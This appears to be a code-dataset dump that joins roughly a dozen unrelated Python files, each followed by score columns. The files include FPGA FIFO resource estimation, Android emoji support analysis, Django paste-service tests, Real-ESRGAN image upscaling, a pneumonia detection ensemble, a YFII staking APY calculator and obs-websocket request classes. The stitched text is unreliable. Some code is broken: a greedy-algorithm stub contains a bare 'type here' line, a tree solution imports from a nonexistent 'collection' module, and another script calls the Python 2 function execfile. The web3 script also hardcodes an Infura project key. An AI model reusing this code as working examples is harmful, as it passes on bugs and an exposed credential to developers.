return (math.ceil(depth / 4096)) * (math.ceil(W / 4))
elif W <= 9:
return (math.ceil(depth / 2048)) * (math.ceil(W / 9))
elif W <= 18 or depth > 512:
return (math.ceil(depth / 1024)) * (math.ceil(W / 18))
else:
return (math.ceil(depth / 512)) * (math.ceil(W / 36))
def uram_estimation(self):
"""Calculates resource estimation for URAM"""
impl = self.get_nodeattr("impl_style")
ram_type = self.get_nodeattr("ram_style")
depth = self.get_nodeattr("depth")
W = self.get_instream_width()
if impl == "rtl" or (impl == "vivado" and ram_type != "ultra"):
# Non-BRAM based implementation
return 0
else:
return (math.ceil(depth / 4096)) * (math.ceil(W / 72))
def bram_efficiency_estimation(self):
depth = self.get_nodeattr("depth")
W = self.get_instream_width()
bram16_est = self.bram_estimation()
if bram16_est == 0:
return 1
wbits = W * depth
bram16_est_capacity = bram16_est * 36 * 512
return wbits / bram16_est_capacity
def lut_estimation(self):
"""Calculates resource estimations for LUTs"""
impl = self.get_nodeattr("impl_style")
ram_type = self.get_nodeattr("ram_style")
depth = self.get_nodeattr("depth")
W = self.get_instream_width()
address_luts = 2 * math.ceil(math.log(depth, 2))
if impl == "rtl" or (impl == "vivado" and ram_type == "distributed"):
ram_luts = (math.ceil(depth / 32)) * (math.ceil(W / 2))
else:
ram_luts = 0
return int(address_luts + ram_luts)
def prepare_rtlsim(self):
assert self.get_nodeattr("impl_style") != "vivado", (
"StreamingFIFO impl_style "
"cannot be vivado for rtlsim. Only impl_style=rtl supported."
)
super().prepare_rtlsim()
| 1.351563 | 1 |
android_fonts.py | chrissimpkins/android_fonts | 1 | 3310 | import ast
import emoji
import os
import pandas as pd
_SUPPORT_CACHE_CSV = emoji.datafile('emoji_support.csv')
_API_LEVELS = {
1: ("(no codename)", "1.0"),
2: ("(no codename)", "1.1"),
3: ("Cupcake", "1.5 "),
4: ("Donut", "1.6 "),
5: ("Eclair", "2.0"),
6: ("Eclair", "2.0.1"),
7: ("Eclair", "2.1 "),
8: ("Froyo", "2.2.x "),
9: ("Gingerbread", "2.3 - 2.3.2 "),
10: ("Gingerbread", "2.3.3 - 2.3.7"),
11: ("Honeycomb", "3.0"),
12: ("Honeycomb", "3.1 "),
13: ("Honeycomb", "3.2.x"),
14: ("Ice Cream Sandwich", "4.0.1 - 4.0.2 "),
15: ("Ice Cream Sandwich", "4.0.3 - 4.0.4 "),
16: ("Jelly Bean", "4.1.x"),
17: ("Jelly Bean", "4.2.x"),
18: ("Jelly Bean", "4.3.x"),
19: ("KitKat", "4.4 - 4.4.4"),
21: ("Lollipop", "5.0"),
22: ("Lollipop", "5.1"),
23: ("Marshmallow", "6.0"),
24: ("Nougat", "7.0"),
25: ("Nougat", "7.1"),
26: ("Oreo", "8.0.0"),
27: ("Oreo", "8.1.0"),
28: ("Pie", "9"),
29: ("Android 10 (Q)", "10"),
30: ("Android 11 (R)", "11"),
31: ("Android 12 (S)", "12"),
}
def api_levels():
return _API_LEVELS
def is_font_file(file):
_, ext = os.path.splitext(file)
return ext.lower() in {'.ttf', '.otf', '.ttc'}
def metadata():
records = []
for root, dirs, files in os.walk('api_level'):
for file in files:
if is_font_file(file):
full_file = os.path.join(root, file)
api_level = int(os.path.basename(root))
size = os.stat(full_file).st_size
records.append((api_level, full_file, size))
df = pd.DataFrame(records)
df.columns = ['api_level', 'font_file', 'file_size']
return df
def emoji_support():
"""Dataframe of [emoji_level, font_file, codepoints, supported].
Includes every sequence we could find of any type.
Requires prior execution of populate_emoji_support.py"""
if not os.path.isfile(_SUPPORT_CACHE_CSV):
raise IOError('Please run populate_emoji_support.py first')
return (pd.read_csv(_SUPPORT_CACHE_CSV, converters={'cp_seq': ast.literal_eval})
.rename(columns={'cp_seq': 'codepoints'}))
def font_summary():
df = metadata()
sf = (df
.groupby(['api_level'])
.agg({'font_file': 'count', 'file_size': 'sum'}))
sf['file_size'] = sf['file_size'].apply(lambda sz: (sz / pow(2, 20)))
sf.rename(columns = {
'font_file': 'num_files',
'file_size': 'size_MB',
}, inplace=True)
sf['delta_size_MB'] = sf['size_MB'] - sf['size_MB'].shift(1)
sf.reset_index(inplace=True)
return sf
def emoji_detail():
df = emoji_support()
# merge emoji metadata to gain the status column
df = df.merge(emoji.metadata().drop(columns=['emoji_level']),
on='codepoints')
df = df[df['status'] == 'fully-qualified']
df = df.drop(columns='status')
df.supported = df.supported.astype('int32')
df['api_level'] = df.font_file.str.split('/').str[1]
df.api_level = df.api_level.astype('int32')
df['font_file'] = df.font_file.str.split('/').str[2]
return df
def emoji_summary():
df = emoji_detail()
sf = (df.groupby(['font_file', 'api_level', 'emoji_level'])
.agg({'supported': ['sum', 'count']}))
sf.columns = ['supported', 'total']
sf.reset_index(inplace=True)
sf2 = (sf.drop(columns='emoji_level')
.groupby('api_level')
.agg('sum')
.reset_index())
sf2['delta'] = sf2['supported'] - sf2['supported'].shift(1)
sf2.fillna(0, inplace=True)
return sf, sf2
| 2.484375 | 2 |
tests/test_list.py | amikrop/django-paste | 3 | 3311 | import json
from django.urls import reverse
from rest_framework import status
from rest_framework.test import APITestCase
from paste import constants
from tests.mixins import SnippetListTestCaseMixin
from tests.utils import constant, create_snippet, create_user
class SnippetListTestCase(SnippetListTestCaseMixin, APITestCase):
"""Tests for the snippet list view."""
def url(self):
"""Return the snippet list URL."""
return reverse('snippet-list')
def post(self, **kwargs):
"""Send a POST request to the view's URL with data indicated by given
kwargs, as JSON, using the proper content-type, and return the
response.
"""
return self.client.post(
self.url(), data=json.dumps(kwargs),
content_type='application/json')
def test_get_success(self):
"""Snippet list GET must return all the viewable snippets."""
create_snippet('foo')
create_snippet('bar')
response = self.get()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(response.data), 2)
self.assertEqual(response.data[0]['content'], 'foo')
self.assertEqual(response.data[1]['content'], 'bar')
def test_get_private(self):
"""Snippet list GET must return private snippets only to those
authorized to view them.
"""
owner = create_user('owner')
create_snippet('foo', private=True, owner=owner)
expected = [0, 0, 1, 1]
def check(i):
response = self.get()
self.assertEqual(len(response.data), expected[i])
self.check_for_users(check, owner)
def test_get_list_foreign(self):
"""Snippet list GET must not return snippets owned by other users if
the LIST_FOREIGN setting is True, unless requested by a staff user.
"""
create_snippet('foo')
create_snippet('bar', owner=self.user)
expected = [0, 1, 2]
def check(i):
response = self.get()
self.assertEqual(len(response.data), expected[i])
with constant('LIST_FOREIGN', False):
self.check_for_users(check)
def test_post_success(self):
"""Snippet list POST must create a new snippet."""
response = self.post(
content='foo', style='friendly', embed_title=False)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(response.data['content'], 'foo')
self.assertEqual(response.data['title'], '')
self.assertEqual(response.data['language'], '')
self.assertEqual(response.data['style'], 'friendly')
self.assertEqual(
response.data['line_numbers'], constants.DEFAULT_LINE_NUMBERS)
self.assertFalse(response.data['embed_title'])
self.assertEqual(response.data['private'], constants.DEFAULT_PRIVATE)
self.assertIsNone(response.data['owner'])
def test_post_owner(self):
"""Snippet list POST must store currently authenticated user as the
newly created snippet's owner.
"""
self.client.force_authenticate(self.user)
response = self.post(content='foo')
self.assertEqual(response.data['owner'], self.user.pk)
def test_post_no_content(self):
"""Snippet list POST must return a 400 Bad Request response if no
content field is set.
"""
response = self.post(title='foo')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_post_oversized_title(self):
"""Snippet list POST must return a 400 Bad Request response if the
title field consists of more characters than the TITLE_MAX_LENGTH
setting indicates.
"""
title = 'a' * (constants.TITLE_MAX_LENGTH + 1)
response = self.post(content='foo', title=title)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_post_invalid(self):
"""Snippet list POST must return a 400 Bad Request response if a value
different than the available choices is set for a multiple choice
field.
"""
for field in ['language', 'style']:
response = self.post(
**{'content': 'foo', field: '123-invalid-abc'})
self.assertEqual(
response.status_code, status.HTTP_400_BAD_REQUEST)
def check_post_forbid_anonymous(self, setting):
"""Check that snippet list POST returns a 403 Forbidden response to
anonymous users if the given setting is True.
"""
expected = (
[status.HTTP_403_FORBIDDEN] + [status.HTTP_400_BAD_REQUEST] * 2)
def check(i):
response = self.post()
self.assertEqual(response.status_code, expected[i])
with constant(setting):
self.check_for_users(check)
def test_post_forbid_anonymous(self):
"""Snippet list POST must return a 403 Forbidden response to anonymous
users if the FORBID_ANONYMOUS setting is True.
"""
self.check_post_forbid_anonymous('FORBID_ANONYMOUS')
def test_post_forbid_anonymous_create(self):
"""Snippet list POST must return a 403 Forbidden response to anonymous
users if the FORBID_ANONYMOUS_CREATE setting is True.
"""
self.check_post_forbid_anonymous('FORBID_ANONYMOUS_CREATE')
def test_post_anonymous_private(self):
"""Snippet list POST must return a 400 Bad Request response to
anonymous users who attempt to create a private snippet.
"""
response = self.post(content='foo', private=True)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_pagination(self):
"""Snippet list must be able to handle pagination."""
self.check_pagination()
| 2.5 | 2 |
Algorithmic Toolbox/Greedy Algorithms/Maximum Advertisement Revenue/maximum_ad_revenue.py | ganeshbhandarkar/Python-Projects | 9 | 3312 | <gh_stars>1-10
# python3
from itertools import permutations
def max_dot_product_naive(first_sequence, second_sequence):
assert len(first_sequence) == len(second_sequence)
assert len(first_sequence) <= 10 ** 3
assert all(0 <= f <= 10 ** 5 for f in first_sequence)
assert all(0 <= s <= 10 ** 5 for s in second_sequence)
max_product = 0
for permutation in permutations(second_sequence):
dot_product = sum(first_sequence[i] * permutation[i] for i in range(len(first_sequence)))
max_product = max(max_product, dot_product)
return max_product
def max_dot_product(first_sequence, second_sequence):
assert len(first_sequence) == len(second_sequence)
assert len(first_sequence) <= 10 ** 3
assert all(0 <= f <= 10 ** 5 for f in first_sequence)
assert all(0 <= s <= 10 ** 5 for s in second_sequence)
type here
if __name__ == '__main__':
n = int(input())
prices = list(map(int, input().split()))
clicks = list(map(int, input().split()))
assert len(prices) == len(clicks) == n
print(max_dot_product(prices, clicks))
| 3.15625 | 3 |
HelloWorldPython/IfStatements.py | SamIge7/Tutorials | 0 | 3313 | <gh_stars>0
hasGoodCredit = True
price = 1000000
deposit = 0
if hasGoodCredit:
deposit = price/10
else:
deposit = price/5
print(f"Deposit needed: £{deposit}") | 2.703125 | 3 |
main.py | vsundesha/documentation-hub-dependencies | 0 | 3314 | <reponame>vsundesha/documentation-hub-dependencies<gh_stars>0
import config as props
import sys
import getopt
from GitHubDataFetcher import GitHubDataFetcher
from DependencyFile import DependencyFile
from ErrorFile import ErrorFile
# Github Token
TOKEN = props.token
OWNER = ""
REPOSITORY = ""
OUTPUTFILE = ""
def showHelp():
print('-r or --repo The name of the github repository')
print('-o or --owner The owner of the github repository')
print('-f or --outputfile (Optional) (Default : <OWNER+REPONAME>dependecies.json) \
The output file')
def main(argv):
global OWNER, REPOSITORY, OUTPUTFILE
try:
# opts are the arguments and remainders are the arrguments that will not be complete if something goes wrong
opts, remainder = getopt.getopt(
argv, "hr:o:f:", ["repo=", "owner=", "outputfile="])
except getopt.GetoptError:
showHelp()
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
showHelp()
sys.exit()
elif opt in ("-r", "--repo"):
REPOSITORY = arg
elif opt in ("-o", "--owner"):
OWNER = arg
elif opt in ("-f", "--outputfile"):
OUTPUTFILE = arg
# check if repo and owner are specified
if(OWNER and REPOSITORY):
# create the fetcher
data = GitHubDataFetcher(OWNER, REPOSITORY, TOKEN)
# get the response object
res = data.getInfo()
# response is type ErrorFile or DependencyFile
if(isinstance(res, DependencyFile)):
if(OUTPUTFILE):
output = OUTPUTFILE+"dependecies.json"
else:
output = OWNER+REPOSITORY+"dependecies.json"
elif(isinstance(res, ErrorFile)):
output = "error.json"
# write file
res.toJson(output)
else:
print("--repo and --owner arguments are mandatory")
if __name__ == "__main__":
main(sys.argv[1:])
| 2.578125 | 3 |
inference_realesrgan.py | blabra/Real-ESRGAN | 0 | 3315 | import argparse
import cv2
import glob
import os
from basicsr.archs.rrdbnet_arch import RRDBNet
import time
from realesrgan import RealESRGANer
from realesrgan.archs.srvgg_arch import SRVGGNetCompact
def main():
"""Inference demo for Real-ESRGAN.
"""
parser = argparse.ArgumentParser()
parser.add_argument('-i', '--input', type=str, default='inputs', help='Input image or folder')
parser.add_argument(
'-n',
'--model_name',
type=str,
default='RealESRGAN_x4plus',
help=('Model names: RealESRGAN_x4plus | RealESRNet_x4plus | RealESRGAN_x4plus_anime_6B | RealESRGAN_x2plus'
'RealESRGANv2-anime-xsx2 | RealESRGANv2-animevideo-xsx2-nousm | RealESRGANv2-animevideo-xsx2'
'RealESRGANv2-anime-xsx4 | RealESRGANv2-animevideo-xsx4-nousm | RealESRGANv2-animevideo-xsx4'))
parser.add_argument('-o', '--output', type=str, default='results', help='Output folder')
parser.add_argument('-s', '--outscale', type=float, default=4, help='The final upsampling scale of the image')
parser.add_argument('--suffix', type=str, default='Realesrgan-4x', help='Suffix of the restored image')
parser.add_argument('-t', '--tile', type=int, default=0, help='Tile size, 0 for no tile during testing')
parser.add_argument('--tile_pad', type=int, default=10, help='Tile padding')
parser.add_argument('--pre_pad', type=int, default=0, help='Pre padding size at each border')
parser.add_argument('--face_enhance', action='store_true', help='Use GFPGAN to enhance face')
parser.add_argument('--half', action='store_true', help='Use half precision during inference')
parser.add_argument(
'--alpha_upsampler',
type=str,
default='realesrgan',
help='The upsampler for the alpha channels. Options: realesrgan | bicubic')
parser.add_argument(
'--ext',
type=str,
default='auto',
help='Image extension. Options: auto | jpg | png, auto means using the same extension as inputs')
args = parser.parse_args()
# determine models according to model names
args.model_name = args.model_name.split('.')[0]
if args.model_name in ['RealESRGAN_x4plus', 'RealESRNet_x4plus']: # x4 RRDBNet model
model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=23, num_grow_ch=32, scale=4)
netscale = 4
elif args.model_name in ['RealESRGAN_x4plus_anime_6B']: # x4 RRDBNet model with 6 blocks
model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=6, num_grow_ch=32, scale=4)
netscale = 4
elif args.model_name in ['RealESRGAN_x2plus']: # x2 RRDBNet model
model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=23, num_grow_ch=32, scale=2)
netscale = 2
elif args.model_name in [
'RealESRGANv2-anime-xsx2', 'RealESRGANv2-animevideo-xsx2-nousm', 'RealESRGANv2-animevideo-xsx2'
]: # x2 VGG-style model (XS size)
model = SRVGGNetCompact(num_in_ch=3, num_out_ch=3, num_feat=64, num_conv=16, upscale=2, act_type='prelu')
netscale = 2
elif args.model_name in [
'RealESRGANv2-anime-xsx4', 'RealESRGANv2-animevideo-xsx4-nousm', 'RealESRGANv2-animevideo-xsx4'
]: # x4 VGG-style model (XS size)
model = SRVGGNetCompact(num_in_ch=3, num_out_ch=3, num_feat=64, num_conv=16, upscale=4, act_type='prelu')
netscale = 4
else:
model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=6, num_grow_ch=32, scale=4)
netscale = 4
# determine model paths
model_path = os.path.join('experiments/pretrained_models', args.model_name + '.pth')
if not os.path.isfile(model_path):
model_path = os.path.join('realesrgan/weights', args.model_name + '.pth')
if not os.path.isfile(model_path):
raise ValueError(f'Model {args.model_name} does not exist.')
# restorer
upsampler = RealESRGANer(
scale=netscale,
model_path=model_path,
model=model,
tile=args.tile,
tile_pad=args.tile_pad,
pre_pad=args.pre_pad,
half=args.half)
if args.face_enhance: # Use GFPGAN for face enhancement
from gfpgan import GFPGANer
face_enhancer = GFPGANer(
model_path='https://github.com/TencentARC/GFPGAN/releases/download/v0.2.0/GFPGANCleanv1-NoCE-C2.pth',
upscale=args.outscale,
arch='clean',
channel_multiplier=2,
bg_upsampler=upsampler)
os.makedirs(args.output, exist_ok=True)
if os.path.isfile(args.input):
paths = [args.input]
else:
paths = sorted(glob.glob(os.path.join(args.input, '*')))
for idx, path in enumerate(paths):
startTime = time.perf_counter()
imgname, extension = os.path.splitext(os.path.basename(path))
img = cv2.imread(path, cv2.IMREAD_UNCHANGED)
if len(img.shape) == 3 and img.shape[2] == 4:
img_mode = 'RGBA'
else:
img_mode = None
if args.ext == 'auto':
extension = "png"
else:
extension = args.ext
if img_mode == 'RGBA': # RGBA images should be saved in png format
extension = 'png'
save_path = os.path.join(args.output, f'{imgname}-{args.suffix}.{extension}')
if os.path.exists(save_path):
continue
try:
if args.face_enhance:
_, _, output = face_enhancer.enhance(img, has_aligned=False, only_center_face=False, paste_back=True)
else:
output, _ = upsampler.enhance(img, outscale=args.outscale)
except RuntimeError as error:
print('Error', error)
print('If you encounter CUDA out of memory, try to set --tile with a smaller number.')
else:
cv2.imwrite(save_path, output)
print(f'NO.{idx}, {imgname} is done, used {round((time.perf_counter() - startTime), 4)} seconds')
if __name__ == '__main__':
main()
| 2.25 | 2 |
examples/Fe__vasp/Fe_fcc_afm_D/Fe_fcc_afm_D_vac_A/clean_vasp.py | eragasa/pypospack | 4 | 3316 | <reponame>eragasa/pypospack
import os
filenames_delete = [
'CHG',
'CHGCAR',
'CONTCAR',
'DOSCAR',
'EIGENVAL',
'IBZKPT',
'job.err',
'job.out',
'OSZICAR',
'PCDAT',
'REPORT',
'vasp.log',
'vasprun.xml',
'WAVECAR',
'XDATCAR'
]
for filename in filenames_delete:
try:
os.remove(filename)
msg = "{} removed.".format(filename)
except FileNotFoundError as e:
msg = "{} does not exist.".format(filename)
except:
raise
print(msg)
| 2.71875 | 3 |
binary_trees/largest_values_in_tree_rows.py | ethyl2/code_challenges | 0 | 3317 | <gh_stars>0
'''
<NAME>'s solution.
See mine in largest_values_in_each_row.py
'''
from collection import deque
def largest_values_in_tree_rows(t):
rv = []
if t is None:
return rv
current_depth = 0
current_max = t.value
q = deque()
# add the root node to the queue at a depth of 0
q.append((t, current_depth))
while len(q) > 0:
node, depth = q.popleft()
# if the depth of the current node is different from
# `current_node`, add `current_max` to `rv` and then
# reset `current_max` and `current_depth`
if depth != current_depth:
rv.append(current_max)
current_max = node.value
current_depth = depth
# otherwise, we update `current_max` if we need to
else:
current_max = max(node.value, current_max)
# add the left and right children of the current node
# to the queue, along with their depths
if node.left:
q.append((node.left, depth + 1))
if node.right:
q.append((node.right, depth + 1))
# don't forget to append the last `current_max`
rv.append(current_max)
return rv
| 3.234375 | 3 |
src/infer/_ExtractSimpleDeformTTA.py | RamsteinWR/PneumoniaRSNA1 | 0 | 3318 | <reponame>RamsteinWR/PneumoniaRSNA1
import json
import os
import re
import numpy as np
import pandas as pd
from src.infer.ExtractDeformableTTA import MAPPINGS_PATH, test_image_set, METADATA_PATH, RCNN0_DETS_DIR
WDIR = os.path.dirname(os.path.abspath(__file__))
def get_results(det_folder, test_set, suffix):
filepath = os.path.join(det_folder, test_set, "results/detections_{}_results_{}.json".format(test_set, suffix))
with open(filepath) as f:
return json.load(f)
def flip_box(box):
"""
box (list, length 4): [x1, y1, w, h]
"""
# Get top right corner of prediction
x1 = box[0]
y1 = box[1]
w = box[2]
h = box[3]
topRight = (x1 + w, y1)
# Top left corner of flipped box is:
newTopLeft = (1024. - topRight[0], topRight[1])
return [newTopLeft[0], newTopLeft[1], w, h]
def convert_dict_to_df(results, mapping, metadata, test_set, flip=False, threshold=0.):
list_of_image_ids = []
list_of_scores = []
list_of_bboxes = []
for res in results:
coco_image_id = res["image_id"]
coco_img_file = "COCO_{}_{}.png".format(test_set, str(coco_image_id).zfill(12))
list_of_image_ids.append(mapping[coco_img_file])
list_of_scores.append(res["score"])
list_of_bboxes.append(res["bbox"])
if flip:
list_of_bboxes = [flip_box(_) for _ in list_of_bboxes]
results_df = pd.DataFrame({"patientId": [pid.split(".")[0] for pid in list_of_image_ids],
"score": list_of_scores,
"x": [box[0] for box in list_of_bboxes],
"y": [box[1] for box in list_of_bboxes],
"w": [box[2] for box in list_of_bboxes],
"h": [box[3] for box in list_of_bboxes],
"bbox": list_of_bboxes})
results_df = results_df.sort_values(["patientId", "score"], ascending=False)
results_df = results_df[results_df.score >= threshold]
results_df = results_df.merge(metadata, on="patientId", how="left")
return results_df[["patientId", "score", "x", "y", "w", "h", "bbox", "view"]]
with open(MAPPINGS_PATH) as f:
mapping = json.load(f)
with open(MAPPINGS_PATH.replace(test_image_set, "{}_flip".format(test_image_set))) as f:
flip_mapping = json.load(f)
metadata = pd.read_csv(METADATA_PATH)
def get_TTA_results(fold_imsize, test_image_set, MAIN_DIR):
TTAs = []
for test_set in [test_image_set, "{}_flip".format(test_image_set)]:
for suffix in ["original", "scale080", "scale120"]:
tmp_results = get_results(os.path.join(MAIN_DIR, "peepin_{}".format(fold_imsize, fold_imsize)),
test_set=test_set, suffix=suffix)
if re.search("_flip", test_set):
tmp_df = convert_dict_to_df(tmp_results,
flip_mapping,
metadata,
test_set=test_set,
flip=True,
threshold=0.01)
else:
tmp_df = convert_dict_to_df(tmp_results,
mapping,
metadata,
test_set=test_set,
flip=False,
threshold=0.01)
TTAs.append(tmp_df)
return TTAs
execfile(os.path.join(WDIR, "DetectionEnsemble.py"))
def run_ensemble(list_of_dfs, metadata, adjust_score=True):
list_of_pids = []
list_of_ensemble_bboxes = []
for pid in np.unique(metadata.patientId):
list_of_tmp_dfs = []
list_of_detections = []
view = metadata[metadata.patientId == pid]["view"].iloc[0]
for df_index, each_df in enumerate(list_of_dfs):
tmp_df = each_df[each_df.patientId == pid]
list_of_bboxes = []
for rownum, row in tmp_df.iterrows():
bbox = row.bbox
bbox.append(1)
bbox.append(row.score)
list_of_bboxes.append(bbox)
list_of_detections.append(list_of_bboxes)
from src.infer.DetectionEnsemble import GeneralEnsemble
list_of_ensemble_bboxes.append(GeneralEnsemble(list_of_detections, iou_thresh=0.4))
list_of_pids.append(pid)
# Create new DataFrame
list_of_new_pids = []
list_of_bboxes = []
for i, ensemble_bboxes in enumerate(list_of_ensemble_bboxes):
for bbox in ensemble_bboxes:
list_of_new_pids.append(list_of_pids[i])
list_of_bboxes.append(bbox)
ensemble_bbox_df = pd.DataFrame({"patientId": list_of_new_pids,
"x": [box[0] for box in list_of_bboxes],
"y": [box[1] for box in list_of_bboxes],
"w": [box[2] for box in list_of_bboxes],
"h": [box[3] for box in list_of_bboxes],
"score": [box[5] for box in list_of_bboxes],
"votes": [box[-1] for box in list_of_bboxes],
"bbox": list_of_bboxes})
if adjust_score:
ensemble_bbox_df["score"] = ensemble_bbox_df.score * ensemble_bbox_df.votes
return ensemble_bbox_df
imsizes = [224, 256, 288, 320, 352, 384, 416, 448, 480, 512]
fold0_nom = "fold{}_{}".format(0, imsizes[0])
fold1_nom = "fold{}_{}".format(1, imsizes[1])
fold2_nom = "fold{}_{}".format(2, imsizes[2])
fold3_nom = "fold{}_{}".format(3, imsizes[3])
fold4_nom = "fold{}_{}".format(4, imsizes[4])
fold5_nom = "fold{}_{}".format(5, imsizes[5])
fold6_nom = "fold{}_{}".format(6, imsizes[6])
fold7_nom = "fold{}_{}".format(7, imsizes[7])
fold8_nom = "fold{}_{}".format(8, imsizes[8])
fold9_nom = "fold{}_{}".format(9, imsizes[9])
fold1RCNN0 = run_ensemble(get_TTA_results("fold1_256", test_image_set, RCNN0_DETS_DIR.format(fold1_nom)), metadata)
fold3RCNN0 = run_ensemble(get_TTA_results("fold3_320", test_image_set, RCNN0_DETS_DIR.format(fold3_nom)), metadata)
fold5RCNN0 = run_ensemble(get_TTA_results("fold5_384", test_image_set, RCNN0_DETS_DIR.format(fold5_nom)), metadata)
fold7RCNN0 = run_ensemble(get_TTA_results("fold7_448", test_image_set, RCNN0_DETS_DIR.format(fold7_nom)), metadata)
fold9RCNN0 = run_ensemble(get_TTA_results("fold9_512", test_image_set, RCNN0_DETS_DIR.format(fold9_nom)), metadata)
list_of_dfs = [fold1RCNN0, fold3RCNN0, fold5RCNN0, fold7RCNN0, fold9RCNN0]
final_TTA_ensemble = run_ensemble(list_of_dfs, metadata, adjust_score=False)
final_TTA_ensemble["adjustedScore"] = final_TTA_ensemble.score * final_TTA_ensemble.votes
final_TTA_ensemble = final_TTA_ensemble[["patientId", "x", "y", "w", "h", "score", "votes", "adjustedScore"]]
final_TTA_ensemble.to_csv(os.path.join(WDIR, "../../SimpleDCNPredictions.csv"), index=False)
| 2.390625 | 2 |
pool4.py | yfii/yfiiapi | 4 | 3319 | from web3 import Web3, HTTPProvider
import json
w3url = "https://mainnet.infura.io/v3/998f64f3627548bbaf2630599c1eefca"
w3 = Web3(HTTPProvider(w3url))
WETH = "0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2"
YFII = "0xa1d0E215a23d7030842FC67cE582a6aFa3CCaB83"
DAI = "0x6B175474E89094C44Da98b954EedeAC495271d0F"
iUSDT = "0x72Cf258c852Dc485a853370171d46B9D29fD3184"
POOL4 = "0x3d367C9529f260B0661e1C1E91167C9319ee96cA"
yfii2dai = [YFII, WETH, DAI]
with open("abi/erc20.json") as f:
erc20ABI = json.loads(f.read())
with open("abi/uniswapRouterv2.json") as f:
uniswapABI = json.loads(f.read())
with open("abi/pool4.json") as f:
pool4ABI = json.loads(f.read())
uniswap_instance = w3.eth.contract(
abi=uniswapABI,
address=w3.toChecksumAddress("0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D"),
)
pool4_instance = w3.eth.contract(abi=pool4ABI, address=POOL4)
def getyfiiprice():
price = uniswap_instance.functions.getAmountsOut(
w3.toWei(1, "ether"), yfii2dai
).call()[-1]
return float(w3.fromWei(price, "ether"))
def _weekly_reward():
return pool4_instance.functions.rewardRate().call() / 1e18 * 60480
def _totalStakedAmount():
token_instance = w3.eth.contract(abi=erc20ABI, address=w3.toChecksumAddress(YFII))
return token_instance.functions.balanceOf(POOL4).call() / 1e18
def getDATA():
weekly_reward = (
pool4_instance.functions.rewardRate().call() / 1e6 * 7 * 24 * 60 * 60
)
token_instance = w3.eth.contract(abi=erc20ABI, address=w3.toChecksumAddress(YFII))
totalStakedAmount = token_instance.functions.balanceOf(POOL4).call() / 1e18
YFIIPrice = getyfiiprice()
TVL = totalStakedAmount * YFIIPrice
YFIWeeklyROI = (weekly_reward / TVL) * 100 / 1.01
apy = YFIWeeklyROI * 52
return {"apy": apy, "totalStakedAmount": totalStakedAmount, "TVL": TVL}
if __name__ == "__main__":
print(getDATA())
| 2.203125 | 2 |
obswebsocket/requests.py | PanBartosz/obs-websocket-py | 123 | 3320 | <filename>obswebsocket/requests.py<gh_stars>100-1000
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# THIS FILE WAS GENERATED BY generate_classes.py - DO NOT EDIT #
# (Generated on 2020-12-20 18:26:33.661372) #
from .base_classes import Baserequests
class GetVersion(Baserequests):
"""Returns the latest version of the plugin and the API.
:Returns:
*version*
type: double
OBSRemote compatible API version. Fixed to 1.1 for retrocompatibility.
*obs_websocket_version*
type: String
obs-websocket plugin version.
*obs_studio_version*
type: String
OBS Studio program version.
*available_requests*
type: String
List of available request types, formatted as a comma-separated list string (e.g. : "Method1,Method2,Method3").
*supported_image_export_formats*
type: String
List of supported formats for features that use image export (like the TakeSourceScreenshot request type) formatted as a comma-separated list string
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetVersion'
self.datain['version'] = None
self.datain['obs-websocket-version'] = None
self.datain['obs-studio-version'] = None
self.datain['available-requests'] = None
self.datain['supported-image-export-formats'] = None
def getVersion(self):
return self.datain['version']
def getObsWebsocketVersion(self):
return self.datain['obs-websocket-version']
def getObsStudioVersion(self):
return self.datain['obs-studio-version']
def getAvailableRequests(self):
return self.datain['available-requests']
def getSupportedImageExportFormats(self):
return self.datain['supported-image-export-formats']
class GetAuthRequired(Baserequests):
"""Tells the client if authentication is required. If so, returns authentication parameters `challenge`
and `salt` (see "Authentication" for more information).
:Returns:
*authRequired*
type: boolean
Indicates whether authentication is required.
*challenge*
type: String (optional)
*salt*
type: String (optional)
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetAuthRequired'
self.datain['authRequired'] = None
self.datain['challenge'] = None
self.datain['salt'] = None
def getAuthRequired(self):
return self.datain['authRequired']
def getChallenge(self):
return self.datain['challenge']
def getSalt(self):
return self.datain['salt']
class Authenticate(Baserequests):
"""Attempt to authenticate the client to the server.
:Arguments:
*auth*
type: String
Response to the auth challenge (see "Authentication" for more information).
"""
def __init__(self, auth):
Baserequests.__init__(self)
self.name = 'Authenticate'
self.dataout['auth'] = auth
class SetHeartbeat(Baserequests):
"""Enable/disable sending of the Heartbeat event
:Arguments:
*enable*
type: boolean
Starts/Stops emitting heartbeat messages
"""
def __init__(self, enable):
Baserequests.__init__(self)
self.name = 'SetHeartbeat'
self.dataout['enable'] = enable
class SetFilenameFormatting(Baserequests):
"""Set the filename formatting string
:Arguments:
*filename_formatting*
type: String
Filename formatting string to set.
"""
def __init__(self, filename_formatting):
Baserequests.__init__(self)
self.name = 'SetFilenameFormatting'
self.dataout['filename-formatting'] = filename_formatting
class GetFilenameFormatting(Baserequests):
"""Get the filename formatting string
:Returns:
*filename_formatting*
type: String
Current filename formatting string.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetFilenameFormatting'
self.datain['filename-formatting'] = None
def getFilenameFormatting(self):
return self.datain['filename-formatting']
class GetStats(Baserequests):
"""Get OBS stats (almost the same info as provided in OBS' stats window)
:Returns:
*stats*
type: OBSStats
[OBS stats](#obsstats)
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetStats'
self.datain['stats'] = None
def getStats(self):
return self.datain['stats']
class BroadcastCustomMessage(Baserequests):
"""Broadcast custom message to all connected WebSocket clients
:Arguments:
*realm*
type: String
Identifier to be choosen by the client
*data*
type: Object
User-defined data
"""
def __init__(self, realm, data):
Baserequests.__init__(self)
self.name = 'BroadcastCustomMessage'
